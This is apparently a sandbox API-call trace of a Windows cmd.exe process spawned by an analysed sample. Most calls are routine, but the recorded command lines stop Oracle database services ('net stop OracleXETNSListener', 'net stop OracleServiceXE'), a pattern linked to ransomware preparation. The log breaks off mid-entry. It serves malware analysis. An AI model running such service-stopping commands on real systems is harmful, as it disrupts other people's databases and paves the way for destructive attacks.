_wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0061.850] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0061.851] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0061.851] GetProcessHeap () returned 0x5d0000 [0061.851] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e34a8 | out: hHeap=0x5d0000) returned 1 [0061.851] GetProcessHeap () returned 0x5d0000 [0061.851] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xa) returned 0x5dff38 [0061.851] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0061.852] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop OracleXETNSListener", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1bf678*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop OracleXETNSListener", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1bf6c4 | out: lpCommandLine="net stop OracleXETNSListener", lpProcessInformation=0x1bf6c4*(hProcess=0x78, hThread=0x74, dwProcessId=0x6b4, dwThreadId=0x408)) returned 1 [0062.047] CloseHandle (hObject=0x74) returned 1 [0062.047] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0062.047] GetProcessHeap () returned 0x5d0000 [0062.047] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5f10 | out: hHeap=0x5d0000) returned 1 [0062.047] GetEnvironmentStringsW () returned 0x5e5f10* [0062.047] GetProcessHeap () returned 0x5d0000 [0062.047] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb36) returned 0x5e40d0 [0062.047] FreeEnvironmentStringsW (penv=0x5e5f10) returned 1 [0062.047] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0066.244] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1bf5b8 | out: lpExitCode=0x1bf5b8*=0x2) returned 1 [0066.244] CloseHandle (hObject=0x78) returned 1 [0066.245] _vsnwprintf (in: _Buffer=0x1bf700, _BufferCount=0x13, _Format="%08X", _ArgList=0x1bf5c4 | out: _Buffer="00000002") returned 8 [0066.245] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0066.245] GetProcessHeap () returned 0x5d0000 [0066.245] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e40d0 | out: hHeap=0x5d0000) returned 1 [0066.245] GetEnvironmentStringsW () returned 0x5e40d0* [0066.245] GetProcessHeap () returned 0x5d0000 [0066.245] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb5c) returned 0x5e95b8 [0066.245] FreeEnvironmentStringsW (penv=0x5e40d0) returned 1 [0066.245] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0066.245] GetProcessHeap () returned 0x5d0000 [0066.245] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e95b8 | out: hHeap=0x5d0000) returned 1 [0066.245] GetEnvironmentStringsW () returned 0x5e40d0* [0066.245] GetProcessHeap () returned 0x5d0000 [0066.245] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb5c) returned 0x5e95b8 [0066.245] FreeEnvironmentStringsW (penv=0x5e40d0) returned 1 [0066.245] GetProcessHeap () returned 0x5d0000 [0066.245] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5dff38 | out: hHeap=0x5d0000) returned 1 [0066.245] DeleteProcThreadAttributeList (in: lpAttributeList=0x1bf61c | out: lpAttributeList=0x1bf61c) [0066.245] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.245] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.245] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.245] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0066.246] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.246] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0066.246] SetConsoleInputExeNameW () returned 0x1 [0066.246] GetConsoleOutputCP () returned 0x1b5 [0066.246] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0066.246] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.246] exit (_Code=2) Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x246c000" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop OracleServiceXE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x920 [0068.683] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efdb4 | out: lpSystemTimeAsFileTime=0x2efdb4*(dwLowDateTime=0x97c94fd0, dwHighDateTime=0x1d57b18)) [0068.683] GetCurrentProcessId () returned 0x8f0 [0068.683] GetCurrentThreadId () returned 0x920 [0068.683] GetTickCount () returned 0x114b240 [0068.683] QueryPerformanceCounter (in: lpPerformanceCount=0x2efdac | out: lpPerformanceCount=0x2efdac*=18890495805) returned 1 [0068.684] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0068.684] __set_app_type (_Type=0x1) [0068.684] __p__fmode () returned 0x74eb31f4 [0068.684] __p__commode () returned 0x74eb31fc [0068.685] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0068.685] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0068.685] GetCurrentThreadId () returned 0x920 [0068.685] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x920) returned 0x60 [0068.685] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0068.685] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0068.685] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.686] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.686] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efd44 | out: phkResult=0x2efd44*=0x0) returned 0x2 [0068.686] VirtualQuery (in: lpAddress=0x2efd7b, lpBuffer=0x2efd14, dwLength=0x1c | out: lpBuffer=0x2efd14*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.686] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efd14, dwLength=0x1c | out: lpBuffer=0x2efd14*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.686] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efd14, dwLength=0x1c | out: lpBuffer=0x2efd14*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.686] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efd14, dwLength=0x1c | out: lpBuffer=0x2efd14*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.686] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efd14, dwLength=0x1c | out: lpBuffer=0x2efd14*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0068.686] GetConsoleOutputCP () returned 0x1b5 [0068.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0068.686] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0068.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.686] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.686] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0068.687] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.687] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.687] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.687] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0068.687] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.687] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0068.687] GetEnvironmentStringsW () returned 0x6c2040* [0068.687] GetProcessHeap () returned 0x6b0000 [0068.687] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xaca) returned 0x6c2b18 [0068.688] FreeEnvironmentStringsW (penv=0x6c2040) returned 1 [0068.688] GetProcessHeap () returned 0x6b0000 [0068.688] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4) returned 0x6c0c78 [0068.688] GetEnvironmentStringsW () returned 0x6c2040* [0068.688] GetProcessHeap () returned 0x6b0000 [0068.688] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xaca) returned 0x6c35f0 [0068.688] FreeEnvironmentStringsW (penv=0x6c2040) returned 1 [0068.688] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eecb4 | out: phkResult=0x2eecb4*=0x68) returned 0x0 [0068.688] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x0, lpData=0x2eecc0*=0x0, lpcbData=0x2eecb8*=0x1000) returned 0x2 [0068.688] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x4, lpData=0x2eecc0*=0x1, lpcbData=0x2eecb8*=0x4) returned 0x0 [0068.688] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x0, lpData=0x2eecc0*=0x1, lpcbData=0x2eecb8*=0x1000) returned 0x2 [0068.688] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x4, lpData=0x2eecc0*=0x0, lpcbData=0x2eecb8*=0x4) returned 0x0 [0068.688] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x4, lpData=0x2eecc0*=0x40, lpcbData=0x2eecb8*=0x4) returned 0x0 [0068.688] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x4, lpData=0x2eecc0*=0x40, lpcbData=0x2eecb8*=0x4) returned 0x0 [0068.688] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x0, lpData=0x2eecc0*=0x40, lpcbData=0x2eecb8*=0x1000) returned 0x2 [0068.689] RegCloseKey (hKey=0x68) returned 0x0 [0068.689] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eecb4 | out: phkResult=0x2eecb4*=0x68) returned 0x0 [0068.689] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x0, lpData=0x2eecc0*=0x40, lpcbData=0x2eecb8*=0x1000) returned 0x2 [0068.689] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x4, lpData=0x2eecc0*=0x1, lpcbData=0x2eecb8*=0x4) returned 0x0 [0068.689] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x0, lpData=0x2eecc0*=0x1, lpcbData=0x2eecb8*=0x1000) returned 0x2 [0068.689] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x4, lpData=0x2eecc0*=0x0, lpcbData=0x2eecb8*=0x4) returned 0x0 [0068.689] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x4, lpData=0x2eecc0*=0x9, lpcbData=0x2eecb8*=0x4) returned 0x0 [0068.689] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x4, lpData=0x2eecc0*=0x9, lpcbData=0x2eecb8*=0x4) returned 0x0 [0068.689] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eecbc, lpData=0x2eecc0, lpcbData=0x2eecb8*=0x1000 | out: lpType=0x2eecbc*=0x0, lpData=0x2eecc0*=0x9, lpcbData=0x2eecb8*=0x1000) returned 0x2 [0068.689] RegCloseKey (hKey=0x68) returned 0x0 [0068.689] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0068.689] srand (_Seed=0x5d97ebb3) [0068.689] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop OracleServiceXE" [0068.689] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop OracleServiceXE" [0068.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.689] GetProcessHeap () returned 0x6b0000 [0068.689] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6c2040 [0068.690] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6c2048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.690] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.690] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.690] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.690] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.690] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.690] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.690] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.690] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.690] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.690] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.690] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.690] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.690] GetProcessHeap () returned 0x6b0000 [0068.690] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c2b18 | out: hHeap=0x6b0000) returned 1 [0068.690] GetEnvironmentStringsW () returned 0x6c2258* [0068.690] GetProcessHeap () returned 0x6b0000 [0068.690] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xae2) returned 0x6c4bb8 [0068.690] FreeEnvironmentStringsW (penv=0x6c2258) returned 1 [0068.690] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.690] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.690] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.690] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.690] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.690] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.690] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.691] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.691] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.691] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.691] GetProcessHeap () returned 0x6b0000 [0068.691] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x54) returned 0x6c56a8 [0068.691] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efa80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2efa80, lpFilePart=0x2efa7c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2efa7c*="Desktop") returned 0x25 [0068.691] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.691] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef7fc | out: lpFindFileData=0x2ef7fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6c1ec0 [0068.691] FindClose (in: hFindFile=0x6c1ec0 | out: hFindFile=0x6c1ec0) returned 1 [0068.691] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef7fc | out: lpFindFileData=0x2ef7fc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6c1ec0 [0068.691] FindClose (in: hFindFile=0x6c1ec0 | out: hFindFile=0x6c1ec0) returned 1 [0068.691] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.691] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef7fc | out: lpFindFileData=0x2ef7fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6c1ec0 [0068.691] FindClose (in: hFindFile=0x6c1ec0 | out: hFindFile=0x6c1ec0) returned 1 [0068.691] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.692] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.692] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.692] GetProcessHeap () returned 0x6b0000 [0068.692] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c4bb8 | out: hHeap=0x6b0000) returned 1 [0068.692] GetEnvironmentStringsW () returned 0x6c40c8* [0068.692] GetProcessHeap () returned 0x6b0000 [0068.692] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb36) returned 0x6c5f08 [0068.692] FreeEnvironmentStringsW (penv=0x6c40c8) returned 1 [0068.692] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.692] GetProcessHeap () returned 0x6b0000 [0068.692] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c56a8 | out: hHeap=0x6b0000) returned 1 [0068.692] GetProcessHeap () returned 0x6b0000 [0068.692] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400e) returned 0x6c6a48 [0068.692] GetProcessHeap () returned 0x6b0000 [0068.692] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3e) returned 0x6c1ec0 [0068.693] GetProcessHeap () returned 0x6b0000 [0068.693] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c6a48 | out: hHeap=0x6b0000) returned 1 [0068.693] GetConsoleOutputCP () returned 0x1b5 [0069.361] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.361] GetUserDefaultLCID () returned 0x409 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efbc0, cchData=128 | out: lpLCData="0") returned 2 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efbc0, cchData=128 | out: lpLCData="0") returned 2 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efbc0, cchData=128 | out: lpLCData="1") returned 2 [0069.362] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, 